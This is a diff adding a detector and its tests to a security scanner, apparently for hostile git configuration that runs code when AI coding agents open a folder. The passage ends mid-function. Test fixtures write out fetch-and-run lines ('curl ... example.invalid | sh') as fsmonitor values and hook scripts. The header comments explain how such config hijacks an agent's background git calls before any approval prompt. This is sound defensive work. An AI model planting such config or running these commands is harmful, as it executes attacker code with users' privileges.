+ * Coverage for repository-supplied git configuration that executes when a
+ * coding agent opens the folder (issue #203, GitSpawn / CVE-2026-71963).
+ *
+ * FIXTURE SAFETY
+ * --------------
+ * Every fixture here is built into a temp directory at run time and torn down
+ * afterwards. None of it is committed. A checked-in `.git/config` carrying
+ * `core.fsmonitor = <command>` would be a working attack against this
+ * repository's own contributors and CI: any git invocation with that directory
+ * as the cwd would execute it, and `npm test` runs plenty. The fixture
+ * directory is therefore named `dot-git` on disk when a test needs one on disk,
+ * and materialised as `.git` only inside the temp tree.
+ *
+ * Run: node --test cli/__tests__/workspace-trust-git.test.js
+ */
+
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import fs from 'fs';
+import path from 'path';
+import os from 'os';
+
+import { WorkspaceTrustAgent } from '../agents/workspace-trust-agent.js';
+
+function tmp() { return fs.mkdtempSync(path.join(os.tmpdir(), 'shipsafe-wstrust-')); }
+function cleanup(dir) { try { fs.rmSync(dir, { recursive: true, force: true }); } catch { /* */ } }
+
+/** Build a temp repo with the given .git/config contents. */
+function repoWithConfig(dir, config) {
+  const gitDir = path.join(dir, '.git');
+  fs.mkdirSync(gitDir, { recursive: true });
+  fs.writeFileSync(path.join(gitDir, 'config'), config);
+  return gitDir;
+}
+
+async function scan(dir) {
+  return new WorkspaceTrustAgent().analyze({ rootPath: dir, files: [], recon: {}, options: {} });
+}
+
+const rulesOf = (findings) => findings.map((f) => f.rule);
+
+// =============================================================================
+// core.fsmonitor — the GitSpawn primary sink
+// =============================================================================
+
+describe('WorkspaceTrustAgent — core.fsmonitor', () => {
+  it('flags fsmonitor set to a command', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, [
+        '[core]',
+        '\trepositoryformatversion = 0',
+        '\tfsmonitor = "curl -s https://example.invalid/p | sh"',
+        '',
+      ].join('\n'));
+
+      const f = await scan(dir);
+      const hit = f.find((x) => x.rule === 'WORKSPACE_GIT_FSMONITOR_EXEC');
+
+      assert.ok(hit, 'expected WORKSPACE_GIT_FSMONITOR_EXEC');
+      assert.equal(hit.severity, 'critical');
+      assert.equal(hit.confidence, 'high');
+      assert.equal(hit.line, 3, 'finding points at the offending line');
+      assert.match(hit.matched, /curl/);
+    } finally { cleanup(dir); }
+  });
+
+  it('does not flag fsmonitor = true, which selects git\'s built-in daemon', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, '[core]\n\tfsmonitor = true\n');
+      const f = await scan(dir);
+      assert.ok(!rulesOf(f).includes('WORKSPACE_GIT_FSMONITOR_EXEC'));
+    } finally { cleanup(dir); }
+  });
+
+  it('does not flag any of git\'s boolean spellings', async () => {
+    for (const value of ['true', 'false', 'yes', 'no', 'on', 'off', '1', '0', 'TRUE']) {
+      const dir = tmp();
+      try {
+        repoWithConfig(dir, `[core]\n\tfsmonitor = ${value}\n`);
+        const f = await scan(dir);
+        assert.ok(
+          !rulesOf(f).includes('WORKSPACE_GIT_FSMONITOR_EXEC'),
+          `fsmonitor = ${value} must not be reported`
+        );
+      } finally { cleanup(dir); }
+    }
+  });
+
+  it('does not flag a bare fsmonitor key, which git reads as true', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, '[core]\n\tfsmonitor\n');
+      const f = await scan(dir);
+      assert.ok(!rulesOf(f).includes('WORKSPACE_GIT_FSMONITOR_EXEC'));
+    } finally { cleanup(dir); }
+  });
+
+  it('ignores a trailing comment when reading the command', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, '[core]\n\tfsmonitor = ./watch.sh # speeds up status\n');
+      const f = await scan(dir);
+      const hit = f.find((x) => x.rule === 'WORKSPACE_GIT_FSMONITOR_EXEC');
+      assert.ok(hit);
+      assert.equal(hit.matched, './watch.sh');
+    } finally { cleanup(dir); }
+  });
+
+  it('reports both occurrences when a safe value is overridden by a command', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, '[core]\n\tfsmonitor = true\n\tfsmonitor = ./payload.sh\n');
+      const f = await scan(dir).then((r) => r.filter((x) => x.rule === 'WORKSPACE_GIT_FSMONITOR_EXEC'));
+      assert.equal(f.length, 1, 'only the command value is a sink');
+      assert.equal(f[0].line, 3);
+    } finally { cleanup(dir); }
+  });
+
+  it('reads .git/config through a gitdir pointer file', async () => {
+    const dir = tmp();
+    try {
+      const real = path.join(dir, 'real-git-dir');
+      fs.mkdirSync(real, { recursive: true });
+      fs.writeFileSync(path.join(real, 'config'), '[core]\n\tfsmonitor = ./payload.sh\n');
+      fs.writeFileSync(path.join(dir, '.git'), 'gitdir: ./real-git-dir\n');
+
+      const f = await scan(dir);
+      assert.ok(rulesOf(f).includes('WORKSPACE_GIT_FSMONITOR_EXEC'));
+    } finally { cleanup(dir); }
+  });
+
+  it('strips control characters from the reported value', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, `[core]\n\tfsmonitor = ./p\u001b[2Jayload.sh\n`);
+      const f = await scan(dir);
+      const hit = f.find((x) => x.rule === 'WORKSPACE_GIT_FSMONITOR_EXEC');
+      assert.ok(hit);
+      // eslint-disable-next-line no-control-regex
+      assert.ok(!/[\u0000-\u001f\u007f]/.test(hit.matched), 'no raw escape sequences reach output');
+    } finally { cleanup(dir); }
+  });
+});
+
+// =============================================================================
+// core.hooksPath
+// =============================================================================
+
+describe('WorkspaceTrustAgent — core.hooksPath', () => {
+  it('flags hooks redirected into the repository', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, '[core]\n\thooksPath = .githooks\n');
+      fs.mkdirSync(path.join(dir, '.githooks'), { recursive: true });
+
+      const f = await scan(dir);
+      const hit = f.find((x) => x.rule === 'WORKSPACE_GIT_HOOKS_PATH');
+      assert.ok(hit, 'expected WORKSPACE_GIT_HOOKS_PATH');
+      assert.equal(hit.severity, 'critical');
+    } finally { cleanup(dir); }
+  });
+
+  it('does not flag a hooksPath outside the scanned tree', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, '[core]\n\thooksPath = /usr/local/share/githooks\n');
+      const f = await scan(dir);
+      assert.ok(!rulesOf(f).includes('WORKSPACE_GIT_HOOKS_PATH'));
+    } finally { cleanup(dir); }
+  });
+
+  it('does not flag husky, which redirects hooksPath by design', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, '[core]\n\thooksPath = .husky/_\n');
+      fs.mkdirSync(path.join(dir, '.husky', '_'), { recursive: true });
+      fs.writeFileSync(path.join(dir, '.husky', '_', 'husky.sh'), '#!/bin/sh\n');
+
+      const f = await scan(dir);
+      assert.ok(!rulesOf(f).includes('WORKSPACE_GIT_HOOKS_PATH'));
+    } finally { cleanup(dir); }
+  });
+
+  it('does not flag lefthook when its config is present', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, '[core]\n\thooksPath = .lefthook\n');
+      fs.mkdirSync(path.join(dir, '.lefthook'), { recursive: true });
+      fs.writeFileSync(path.join(dir, 'lefthook.yml'), 'pre-commit:\n  commands:\n    lint:\n      run: npm run lint\n');
+
+      const f = await scan(dir);
+      assert.ok(!rulesOf(f).includes('WORKSPACE_GIT_HOOKS_PATH'));
+    } finally { cleanup(dir); }
+  });
+
+  it('still flags a .husky path when husky is not actually installed', async () => {
+    const dir = tmp();
+    try {
+      // Directory name alone must not buy an exemption, or the suppression
+      // becomes the bypass.
+      repoWithConfig(dir, '[core]\n\thooksPath = .husky\n');
+      fs.mkdirSync(path.join(dir, '.husky'), { recursive: true });
+
+      const f = await scan(dir);
+      assert.ok(rulesOf(f).includes('WORKSPACE_GIT_HOOKS_PATH'));
+    } finally { cleanup(dir); }
+  });
+});
+
+// =============================================================================
+// attr.tree
+// =============================================================================
+
+describe('WorkspaceTrustAgent — attr.tree', () => {
+  it('flags attributes sourced from a repository-controlled tree', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, '[attr]\n\ttree = HEAD:.gitattributes\n');
+      const f = await scan(dir);
+      const hit = f.find((x) => x.rule === 'WORKSPACE_GIT_ATTR_TREE');
+      assert.ok(hit);
+      assert.equal(hit.severity, 'high');
+    } finally { cleanup(dir); }
+  });
+
+  it('reports nothing for a config with no attr section', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, '[core]\n\trepositoryformatversion = 0\n');
+      const f = await scan(dir);
+      assert.equal(f.length, 0);
+    } finally { cleanup(dir); }
+  });
+});
+
+// =============================================================================
+// filter.*.process / clean / smudge
+// =============================================================================
+
+describe('WorkspaceTrustAgent — content filters', () => {
+  it('flags a filter process command', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, '[filter "build"]\n\tprocess = node ./tools/filter.js\n');
+      const f = await scan(dir);
+      const hit = f.find((x) => x.rule === 'WORKSPACE_GIT_FILTER_PROCESS');
+      assert.ok(hit);
+      assert.equal(hit.severity, 'high');
+      assert.match(hit.description, /filter\.build\.process/);
+    } finally { cleanup(dir); }
+  });
+
+  it('flags clean and smudge commands', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, '[filter "x"]\n\tclean = ./clean.sh\n\tsmudge = ./smudge.sh\n');
+      const f = await scan(dir).then((r) => r.filter((x) => x.rule === 'WORKSPACE_GIT_FILTER_PROCESS'));
+      assert.equal(f.length, 2);
+    } finally { cleanup(dir); }
+  });
+
+  it('does not flag Git LFS', async () => {
+    const dir = tmp();
+    try {
+      repoWithConfig(dir, [
+        '[filter "lfs"]',
+        '\tclean = git-lfs clean -- %f',
+        '\tsmudge = git-lfs smudge -- %f',
+        '\tprocess = git-lfs filter-process',
+        '\trequired = true',
+        '',
+      ].join('\n'));
+
+      const f = await scan(dir);
+      assert.ok(!rulesOf(f).includes('WORKSPACE_GIT_FILTER_PROCESS'));
+    } finally { cleanup(dir); }
+  });
+
+  it('does not let a hostile command hide behind the lfs filter name', async () => {
+    const dir = tmp();
+    try {
+      // The exemption is by command, not by filter name.
+      repoWithConfig(dir, '[filter "lfs"]\n\tprocess = ./payload.sh\n');
+      const f = await scan(dir);
+      assert.ok(rulesOf(f).includes('WORKSPACE_GIT_FILTER_PROCESS'));
+    } finally { cleanup(dir); }
+  });
+});
+
+// =============================================================================
+// .git/hooks
+// =============================================================================
+
+describe('WorkspaceTrustAgent — hook scripts', () => {
+  it('flags an executable hook that is not a sample', async () => {
+    const dir = tmp();
+    try {
+      const gitDir = repoWithConfig(dir, '[core]\n\trepositoryformatversion = 0\n');
+      const hooks = path.join(gitDir, 'hooks');
+      fs.mkdirSync(hooks, { recursive: true });
+      fs.writeFileSync(path.join(hooks, 'post-checkout'), '#!/bin/sh\ncurl example.invalid | sh\n', { mode: 0o755 });
+
+      const f = await scan(dir);
+      const hit = f.find((x) => x.rule === 'WORKSPACE_GIT_HOOK_PRESENT');
+      assert.ok(hit, 'expected WORKSPACE_GIT_HOOK_PRESENT');
+      assert.equal(hit.matched, 'post-checkout');
+    } finally { cleanup(dir); }
+  });
+
+  it('does not flag git\'s shipped .sample hooks', async () => {
+    const dir = tmp();
+    try {
+      const gitDir = repoWithConfig(dir, '[core]\n\trepositoryformatversion = 0\n');
+      const hooks = path.join(gitDir, 'hooks');
+      fs.mkdirSync(hooks, { recursive: true });
+      for (const name of ['pre-commit.sample', 'post-checkout.sample', 'pre-push.sample']) {
+        fs.writeFileSync(path.join(hooks, name), '#!/bin/sh\nexit 0\n', { mode: 0o755 });
+      }
+
+      const f = await scan(dir);
+      assert.ok(!rulesOf(f).includes('WORKSPACE_GIT_HOOK_PRESENT'));
+    } finally { cleanup(dir); }
+  });
+
+  it('does not flag a non-executable file in the hooks directory', async () => {
+    const dir = tmp();
+    try {
+      const gitDir = repoWithConfig(dir, '[core]\n\trepositoryformatversion = 0\n');
+      const hooks = path.join(gitDir, 'hooks');
+      fs.mkdirSync(hooks, { recursive: true });
+      fs.writeFileSync(path.join(hooks, 'README'), 'notes\n', { mode: 0o644 });
+
+      const f = await scan(dir);
+      assert.ok(!rulesOf(f).includes('WORKSPACE_GIT_HOOK_PRESENT'));
+    } finally { cleanup(dir); }
+  });
+
+  it('does not read a hooks directory outside the scanned tree', async () => {
+    const dir = tmp();
+    const outside = tmp();
+    try {
+      // A hooksPath pointing out of the repository is the user's own machine
+      // configuration. Reporting the scripts there would blame the repository
+      // for files it never shipped.
+      fs.writeFileSync(path.join(outside, 'post-checkout'), '#!/bin/sh\necho mine\n', { mode: 0o755 });
+      repoWithConfig(dir, `[core]\n\thooksPath = ${outside}\n`);
+
+      const f = await scan(dir);
+      assert.ok(!rulesOf(f).includes('WORKSPACE_GIT_HOOK_PRESENT'));
+      assert.ok(!rulesOf(f).includes('WORKSPACE_GIT_HOOKS_PATH'));
+    } finally { cleanup(dir); cleanup(outside); }
+  });
+
+  it('does not fall back to .git/hooks once hooksPath is set elsewhere', async () => {
+    const dir = tmp();
+    const outside = tmp();
+    try {
+      // Git stops consulting .git/hooks when hooksPath is set, so a leftover
+      // script there will never run and must not be reported as if it would.
+      const gitDir = repoWithConfig(dir, `[core]\n\thooksPath = ${outside}\n`);
+      const hooks = path.join(gitDir, 'hooks');
+      fs.mkdirSync(hooks, { recursive: true });
+      fs.writeFileSync(path.join(hooks, 'pre-commit'), '#!/bin/sh\nexit 0\n', { mode: 0o755 });
+
+      const f = await scan(dir);
+      assert.ok(!rulesOf(f).includes('WORKSPACE_GIT_HOOK_PRESENT'));
+    } finally { cleanup(dir); cleanup(outside); }
+  });
+
+  it('reads the redirected directory, including for an installed hook manager', async () => {
+    const dir = tmp();
+    try {
+      // husky is exempt from the hooksPath finding, but a planted script inside
+      // its directory still executes and must still be reported.
+      repoWithConfig(dir, '[core]\n\thooksPath = .husky/_\n');
+      const huskyDir = path.join(dir, '.husky', '_');
+      fs.mkdirSync(huskyDir, { recursive: true });
+      fs.writeFileSync(path.join(huskyDir, 'husky.sh'), '#!/bin/sh\n');
+      fs.writeFileSync(path.join(huskyDir, 'post-checkout'), '#!/bin/sh\ncurl example.invalid | sh\n', { mode: 0o755 });
+
+      const f = await scan(dir);
+      assert.ok(!rulesOf(f).includes('WORKSPACE_GIT_HOOKS_PATH'), 'husky redirect stays suppressed');
+      assert.ok(rulesOf(f).includes('WORKSPACE_GIT_HOOK_PRESENT'), 'its contents are still read');
+    } finally { cleanup(dir); }
+  });
+});
+
+// =============================================================================
+// SAFE BASELINE
+// =============================================================================
+
+describe('WorkspaceTrustAgent — safe repositories', () => {
+  it('reports nothing for an ordinary repository', async () => {
+    const dir = tmp();
+    try {
+      const gitDir = repoWithConfig(dir, [
+        '[core]',
+        '\trepositoryformatversion = 0',
+        '\tfilemode = true',
+        '\tbare = false',
+        '\tlogallrefupdates = true',
+        '[remote "origin"]',
+        '\turl = https://github.com/example/example.git',
+        '\tfetch = +refs/heads/*:refs/remotes/origin/*',
+        '[branch "main"]',
+        '\tremote = origin',
+        '\tmerge = refs/heads/main',
+        '',
+      ].join('\n'));
+
+      const hooks = path.join(gitDir, 'hooks');
+      fs.mkdirSync(hooks, { recursive: true });
+      fs.writeFileSync(path.join(hooks, 'pre-commit.sample'), '#!/bin/sh\nexit 0\n', { mode: 0o755 });
+
+      const f = await scan(dir);
+      assert.deepEqual(f, [], 'a healthy repository produces no findings');
+    } finally { cleanup(dir); }
+  });
+
+  it('reports nothing when there is no git directory at all', async () => {
+    const dir = tmp();
+    try {
+      fs.writeFileSync(path.join(dir, 'index.js'), 'export default 1;\n');
+      const f = await scan(dir);
+      assert.deepEqual(f, []);
+    } finally { cleanup(dir); }
+  });
+});

--- a/cli/agents/index.js
+++ b/cli/agents/index.js
@@ -50,7 +50,7 @@ export { PolicyEngine } from './policy-engine.js';
 export { HTMLReporter } from './html-reporter.js';
 
 /**
- * Create a fully configured orchestrator with all 29 scanning agents.
+ * Create a fully configured orchestrator with all 30 scanning agents.
  * (VerifierAgent and DeepAnalyzer run as post-processors, not in the agent pool.)
  *
  * Plugin system: if rootPath is provided, custom agents from

--- a/cli/agents/index.js
+++ b/cli/agents/index.js
@@ -30,6 +30,7 @@ export { MemoryPoisoningAgent } from './memory-poisoning-agent.js';
 export { LegalRiskAgent, LEGALLY_RISKY_PACKAGES } from './legal-risk-agent.js';
 export { ManagedAgentScanner } from './managed-agent-scanner.js';
 export { HermesSecurityAgent } from './hermes-security-agent.js';
+export { WorkspaceTrustAgent } from './workspace-trust-agent.js';
 export { AgentAttestationAgent } from './agent-attestation-agent.js';
 export { AgenticSupplyChainAgent } from './agentic-supply-chain-agent.js';
 export { RobloxSecurityAgent } from './roblox-security-agent.js';
@@ -78,6 +79,7 @@ import { AgentConfigScanner as AgentConfigScannerClass } from './agent-config-sc
 import { MemoryPoisoningAgent as MemoryPoisoningAgentClass } from './memory-poisoning-agent.js';
 import { ManagedAgentScanner as ManagedAgentScannerClass } from './managed-agent-scanner.js';
 import { HermesSecurityAgent as HermesSecurityAgentClass } from './hermes-security-agent.js';
+import { WorkspaceTrustAgent as WorkspaceTrustAgentClass } from './workspace-trust-agent.js';
 import { AgentAttestationAgent as AgentAttestationAgentClass } from './agent-attestation-agent.js';
 import { AgenticSupplyChainAgent as AgenticSupplyChainAgentClass } from './agentic-supply-chain-agent.js';
 import { RobloxSecurityAgent as RobloxSecurityAgentClass } from './roblox-security-agent.js';
@@ -111,6 +113,7 @@ const BUILT_IN_AGENTS = () => [
   new MemoryPoisoningAgentClass(),
   new ManagedAgentScannerClass(),
   new HermesSecurityAgentClass(),
+  new WorkspaceTrustAgentClass(),
   new AgentAttestationAgentClass(),
   new AgenticSupplyChainAgentClass(),
   new RobloxSecurityAgentClass(),

--- a/cli/agents/workspace-trust-agent.js
+++ b/cli/agents/workspace-trust-agent.js
@@ -1,0 +1,472 @@
+/**
+ * Workspace Trust Agent
+ * =====================
+ *
+ * Detects configuration that a repository carries with it and that an agent
+ * can be made to execute before anyone approves anything.
+ *
+ * Manifold Security's GitSpawn research (1 September 2026) showed that nearly
+ * every CLI coding agent runs `git status` or `git diff` in the background to
+ * build project context. Git refreshes its index to answer, and `.git/config`
+ * decides what that refresh executes. The command runs with the user's
+ * privileges, outside the agent's sandbox, before the workspace-trust dialog.
+ * Seven agents were affected and four were unpatched at publication, including
+ * Hermes Agent v0.21.0 under CVE-2026-71963 — the release Ship Safe pins as its
+ * own coverage baseline.
+ *
+ * The delivery constraint is what makes this worth a detector rather than a
+ * vendor patch note. `git clone`, `fetch`, and `pull` never transmit a hostile
+ * `.git/config`, so this arrives the way take-home projects and client handoffs
+ * actually arrive: a zip, a shared drive, a synced folder, a USB stick. By the
+ * time a human could inspect it, the agent has already read the directory.
+ *
+ * Scans: .git/config (and the gitdir it points at), .git/hooks/
+ * Detects: fsmonitor command sinks, redirected hooks paths, repo-controlled
+ *          attribute trees, content filter commands, planted hook scripts
+ *
+ * Maps to: OWASP Agentic AI ASI04 (Supply Chain), ASI05 (Code Execution)
+ *
+ * References:
+ *   https://www.manifold.security/blog/ai-coding-agents-git-hijack
+ *   CVE-2026-72718, CVE-2026-19592, CVE-2026-71963
+ */
+
+import fs from 'fs';
+import path from 'path';
+import { BaseAgent, createFinding } from './base-agent.js';
+import { parseGitConfig, findEntries, isBooleanValue } from '../utils/git-config.js';
+
+// =============================================================================
+// BENIGN CONFIGURATIONS
+// =============================================================================
+
+/**
+ * Filter commands that ship as part of a normal toolchain.
+ *
+ * Git LFS is the overwhelmingly common `filter.*` configuration and appears in
+ * a large share of healthy repositories. A rule that flagged it would fire on
+ * more real projects than hostile ones, which is worse than not shipping the
+ * rule: it teaches people to ignore the category.
+ */
+const KNOWN_FILTER_COMMANDS = [
+  /^git-lfs(\s|$)/,
+  /^git\s+lfs(\s|$)/,
+  /^git-crypt(\s|$)/,
+];
+
+/**
+ * Hook managers that legitimately redirect `core.hooksPath` into the worktree.
+ *
+ * Each entry names the marker that proves the tool is actually installed rather
+ * than merely named. Presence of the marker suppresses WORKSPACE_GIT_HOOKS_PATH
+ * for that directory — but never suppresses WORKSPACE_GIT_HOOK_PRESENT, which
+ * still reads the scripts inside it. A poisoned `.husky/` is a real attack, and
+ * suppressing the redirect must not also suppress its contents.
+ */
+const HOOK_MANAGERS = [
+  { name: 'husky', dir: '.husky', markers: ['_/husky.sh', '_/h', 'husky.sh'] },
+  { name: 'lefthook', dir: '.lefthook', markers: [] },
+];
+
+/** Config files whose presence proves a hook manager is installed. */
+const HOOK_MANAGER_ROOT_MARKERS = {
+  lefthook: ['lefthook.yml', 'lefthook.yaml', 'lefthook.toml', 'lefthook.json'],
+};
+
+// =============================================================================
+// AGENT
+// =============================================================================
+
+export class WorkspaceTrustAgent extends BaseAgent {
+  constructor() {
+    super(
+      'WorkspaceTrustAgent',
+      'Detect repository-supplied configuration that executes when an agent opens the folder — git config command sinks and planted hooks',
+      'supply-chain'
+    );
+  }
+
+  async analyze(context) {
+    const { rootPath } = context;
+    if (!rootPath) return [];
+
+    const gitDir = this._resolveGitDir(rootPath);
+    if (!gitDir) return [];
+
+    let findings = [];
+
+    const configPath = path.join(gitDir, 'config');
+    const entries = this._readConfig(configPath);
+
+    if (entries) {
+      findings = findings.concat(this._checkFsmonitor(entries, configPath));
+      findings = findings.concat(this._checkAttrTree(entries, configPath));
+      findings = findings.concat(this._checkFilters(entries, configPath));
+      findings = findings.concat(this._checkHooksPath(entries, configPath, rootPath));
+    }
+
+    findings = findings.concat(this._checkHookScripts(entries, gitDir, rootPath));
+
+    return findings;
+  }
+
+  // ---------------------------------------------------------------------------
+  // DISCOVERY
+  // ---------------------------------------------------------------------------
+
+  /**
+   * Locate the git directory for a scanned root.
+   *
+   * `.git` is in the scanner's global skip list, so nothing reaches this agent
+   * through the normal file-discovery path and every read here is explicit.
+   * That is deliberate: the skip list exists to keep object storage out of
+   * content scanning, and lifting it would pull thousands of loose objects into
+   * every scan to reach two files.
+   *
+   * `.git` may also be a file rather than a directory. Submodules and linked
+   * worktrees write `gitdir: <path>` there, and since a submodule is one of the
+   * ways a hostile config arrives inside an otherwise ordinary checkout, the
+   * pointer is followed.
+   */
+  _resolveGitDir(rootPath) {
+    const candidate = path.join(rootPath, '.git');
+
+    let stat;
+    try { stat = fs.statSync(candidate); } catch { return null; }
+
+    if (stat.isDirectory()) return candidate;
+    if (!stat.isFile()) return null;
+
+    let pointer;
+    try { pointer = fs.readFileSync(candidate, 'utf8'); } catch { return null; }
+
+    const match = pointer.match(/^\s*gitdir:\s*(.+?)\s*$/m);
+    if (!match) return null;
+
+    const target = path.isAbsolute(match[1]) ? match[1] : path.resolve(rootPath, match[1]);
+    try {
+      return fs.statSync(target).isDirectory() ? target : null;
+    } catch { return null; }
+  }
+
+  _readConfig(configPath) {
+    try {
+      return parseGitConfig(fs.readFileSync(configPath, 'utf8'));
+    } catch { return null; }
+  }
+
+  // ---------------------------------------------------------------------------
+  // RULES
+  // ---------------------------------------------------------------------------
+
+  /**
+   * core.fsmonitor pointing at a command.
+   *
+   * This is GitSpawn's primary sink. `true` and `false` are not findings:
+   * `true` selects git's built-in FSMonitor daemon, which runs no external
+   * program, and treating it as a sink would flag a documented performance
+   * setting on every repository that enables it.
+   */
+  _checkFsmonitor(entries, configPath) {
+    const findings = [];
+
+    for (const entry of findEntries(entries, 'core', 'fsmonitor')) {
+      if (isBooleanValue(entry.value)) continue;
+      if (!entry.value) continue;
+
+      findings.push(createFinding({
+        file: configPath,
+        line: entry.line,
+        severity: 'critical',
+        category: this.category,
+        rule: 'WORKSPACE_GIT_FSMONITOR_EXEC',
+        title: 'Workspace Trust: git fsmonitor runs a repository-supplied command',
+        description:
+          'core.fsmonitor names an external program that git executes whenever it refreshes the index. '
+          + 'Coding agents run git in the background to gather project context, so opening this folder with an agent '
+          + 'can execute this command with your privileges, outside the agent sandbox and before any approval prompt. '
+          + 'This configuration is present in the repository; whether a given agent reaches it depends on that agent and version.',
+        matched: this._quote(entry.value),
+        confidence: 'high',
+        cwe: 'CWE-77',
+        owasp: 'ASI05',
+        fix: 'Remove the core.fsmonitor entry from .git/config, or set it to `true` to use git\'s built-in daemon. '
+          + 'Do not open this directory with a coding agent until it is removed. To disable the setting everywhere, run '
+          + '`git config --global core.fsmonitor false`.',
+      }));
+    }
+
+    return findings;
+  }
+
+  /**
+   * attr.tree sourcing gitattributes from a repository-controlled tree.
+   *
+   * Attributes decide which filters and diff drivers apply to a path, so
+   * controlling the attributes source is a step toward controlling what runs.
+   * It is reported as high rather than critical because reaching execution
+   * needs a second configured piece, unlike fsmonitor which is the sink itself.
+   */
+  _checkAttrTree(entries, configPath) {
+    const findings = [];
+
+    for (const entry of findEntries(entries, 'attr', 'tree')) {
+      if (!entry.value) continue;
+
+      findings.push(createFinding({
+        file: configPath,
+        line: entry.line,
+        severity: 'high',
+        category: this.category,
+        rule: 'WORKSPACE_GIT_ATTR_TREE',
+        title: 'Workspace Trust: gitattributes sourced from a repository-controlled tree',
+        description:
+          'attr.tree makes git read .gitattributes from a tree the repository controls rather than the checked-out worktree. '
+          + 'Attributes select the filters and diff drivers applied to a path, so a repository that also configures a filter '
+          + 'command can direct it at files of its choosing.',
+        matched: this._quote(entry.value),
+        confidence: 'high',
+        cwe: 'CWE-77',
+        owasp: 'ASI04',
+        fix: 'Remove the attr.tree entry from .git/config and review any filter or diff driver configured alongside it.',
+      }));
+    }
+
+    return findings;
+  }
+
+  /**
+   * filter.<name>.process / .clean / .smudge naming a command.
+   *
+   * Filters run during checkout and staging, which an agent triggers routinely.
+   * Known toolchain filters are excluded by command, not by filter name, so a
+   * hostile entry cannot hide by calling itself `lfs`.
+   */
+  _checkFilters(entries, configPath) {
+    const findings = [];
+    const keys = new Set(['process', 'clean', 'smudge']);
+
+    for (const entry of entries) {
+      if (entry.section !== 'filter' || !keys.has(entry.key)) continue;
+      if (!entry.value || isBooleanValue(entry.value)) continue;
+      if (this._isKnownFilterCommand(entry.value)) continue;
+
+      const label = entry.subsection ? `filter.${entry.subsection}.${entry.key}` : `filter.${entry.key}`;
+
+      findings.push(createFinding({
+        file: configPath,
+        line: entry.line,
+        severity: 'high',
+        category: this.category,
+        rule: 'WORKSPACE_GIT_FILTER_PROCESS',
+        title: 'Workspace Trust: git content filter runs a repository-supplied command',
+        description:
+          `${label} names a command that git runs while checking out or staging matching files. `
+          + 'An agent that checks out a branch, stages a change, or resets a file executes it. '
+          + 'The command is configured in the repository rather than by the user.',
+        matched: this._quote(entry.value),
+        confidence: 'high',
+        cwe: 'CWE-77',
+        owasp: 'ASI05',
+        fix: `Remove ${label} from .git/config unless you installed this filter yourself and recognise the command.`,
+      }));
+    }
+
+    return findings;
+  }
+
+  _isKnownFilterCommand(value) {
+    const command = String(value).trim();
+    return KNOWN_FILTER_COMMANDS.some((pattern) => pattern.test(command));
+  }
+
+  /**
+   * core.hooksPath redirected into the worktree.
+   *
+   * Only a path that resolves inside the scanned tree is reported. A hooksPath
+   * pointing outside it is a machine-level choice the user made, and this agent
+   * deliberately does not judge the user's own environment — the question it
+   * answers is what arrived with the repository.
+   *
+   * Recognised hook managers are excluded, because husky and lefthook both do
+   * exactly this by design and are far too common to report. The exclusion
+   * requires an installed marker, not just the directory name, and it never
+   * extends to the scripts themselves.
+   */
+  _checkHooksPath(entries, configPath, rootPath) {
+    const findings = [];
+
+    for (const entry of findEntries(entries, 'core', 'hookspath')) {
+      if (!entry.value || isBooleanValue(entry.value)) continue;
+
+      const resolved = path.resolve(rootPath, entry.value);
+      const relative = path.relative(rootPath, resolved);
+      const insideTree = relative && !relative.startsWith('..') && !path.isAbsolute(relative);
+      if (!insideTree) continue;
+
+      const manager = this._detectHookManager(rootPath, resolved);
+      if (manager) continue;
+
+      findings.push(createFinding({
+        file: configPath,
+        line: entry.line,
+        severity: 'critical',
+        category: this.category,
+        rule: 'WORKSPACE_GIT_HOOKS_PATH',
+        title: 'Workspace Trust: git hooks redirected into the repository',
+        description:
+          `core.hooksPath points at ${relative}, inside the repository itself, so the hook scripts that git runs are `
+          + 'content the repository ships rather than files you wrote. Any git operation an agent performs on this '
+          + 'folder can execute them.',
+        matched: this._quote(entry.value),
+        confidence: 'high',
+        cwe: 'CWE-77',
+        owasp: 'ASI05',
+        fix: `Remove core.hooksPath from .git/config, then review the scripts in ${relative} before running any git command here.`,
+      }));
+    }
+
+    return findings;
+  }
+
+  /**
+   * Identify an installed hook manager owning a hooks directory.
+   * Returns the manager name, or null when nothing proves one is installed.
+   */
+  _detectHookManager(rootPath, hooksDir) {
+    for (const manager of HOOK_MANAGERS) {
+      const managerDir = path.resolve(rootPath, manager.dir);
+      const withinManagerDir = hooksDir === managerDir || hooksDir.startsWith(managerDir + path.sep);
+      if (!withinManagerDir) continue;
+
+      const markers = manager.markers.map((m) => path.join(managerDir, m));
+      const rootMarkers = (HOOK_MANAGER_ROOT_MARKERS[manager.name] || []).map((m) => path.join(rootPath, m));
+
+      if ([...markers, ...rootMarkers].some((p) => this._exists(p))) return manager.name;
+    }
+    return null;
+  }
+
+  /**
+   * Executable hook scripts that are not git's shipped samples.
+   *
+   * Git populates .git/hooks/ with `*.sample` files that are inert because of
+   * the extension. Anything else there is executable on the next matching git
+   * operation, and since .git/hooks/ is not transmitted by clone, a populated
+   * hooks directory in a folder that arrived whole is worth a reviewer's time.
+   *
+   * When core.hooksPath redirects into the worktree the redirected directory is
+   * read instead, including for recognised hook managers: suppressing the
+   * redirect finding must not suppress inspection of what it points at.
+   */
+  _checkHookScripts(entries, gitDir, rootPath) {
+    const findings = [];
+
+    const hooksDir = this._effectiveHooksDir(entries, gitDir, rootPath);
+    if (!hooksDir) return findings;
+
+    let names;
+    try { names = fs.readdirSync(hooksDir); } catch { return findings; }
+
+    for (const name of names.sort()) {
+      if (name.endsWith('.sample')) continue;
+
+      const scriptPath = path.join(hooksDir, name);
+      let stat;
+      try { stat = fs.statSync(scriptPath); } catch { continue; }
